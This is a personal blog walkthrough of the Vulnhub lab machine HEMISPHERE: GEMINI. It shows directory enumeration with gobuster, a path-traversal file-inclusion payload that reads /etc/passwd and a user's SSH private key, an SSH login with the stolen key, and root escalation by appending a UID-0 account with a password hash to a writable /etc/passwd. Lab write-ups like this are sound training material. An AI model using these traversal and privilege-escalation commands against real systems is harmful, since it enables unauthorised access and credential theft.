Vulnhub - HEMISPHERE: GEMINI

Prelude

Since my last post I did Brute It on THM and more or less finished TommyBoy from Vulnhub, although I had to consult a write-up for a hint or two on that one. I did most of it myself. I probably won’t write a post about it.

Introduction

Difficulty: Easy
Flag: 2 (user & root)
Enumeration | Web Application | Privilege Escalation
This works better with VirtualBox rather than VMware

This is HEMISPHERE: GEMINI from Vulnhub.

Ports

This one has FTP, SSH, HTTP and SMB, all on their standard ports. However FTP doesn’t support anonymous login and there is nothing obviously available via SMB so they are both distractions. We move forward with HTTP.

HTTP

robots.txt has three disallowed entries, and none of them exist lol.

Gobuster leads the way:

root@kali:/opt/vulnhub/gemini# gobuster dir -u http://192.168.1.132 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt

This gets a directory called /Portal which has an index page like this:

http://192.168.1.132/Portal/index.php?view=about-us.html

It was presumably intentional with the view parameter but my first thought was LFI, and it was correct:

http://192.168.1.132/Portal/index.php?view=../../../../../../../../../../etc/passwd

This works, and we have a user called william. Probably it’s not as simple as this, right?

http://192.168.1.132/Portal/index.php?view=../../../../../../../../../../../home/william/.ssh/id_rsa

Actually, it is.

root@kali:/opt/vulnhub/gemini# ssh -i id_rsa [email protected]
The authenticity of host '192.168.1.132 (192.168.1.132)' can't be established.
ECDSA key fingerprint is SHA256:WJJG9C/ZF8ojVDQF40UEgPCGZMEGwny3luZufN5+K30.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.132' (ECDSA) to the list of known hosts.
Linux gemini 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64

ASCII ART REMOVED

william@gemini:~$ pwd

Privesc

Linpeas says /etc/passwd is writeable. We know what to do with that!

william@gemini:/dev/shm$ echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd
william@gemini:/dev/shm$ su root2
Contraseña: 
root@gemini:/dev/shm# cd /root
root@gemini:~# ls
root.txt
root@gemini:~# cat root.txt 
root_flag==> vD1JA8mze74XzkmzOA21R4sjZ

Short, sweet, and done.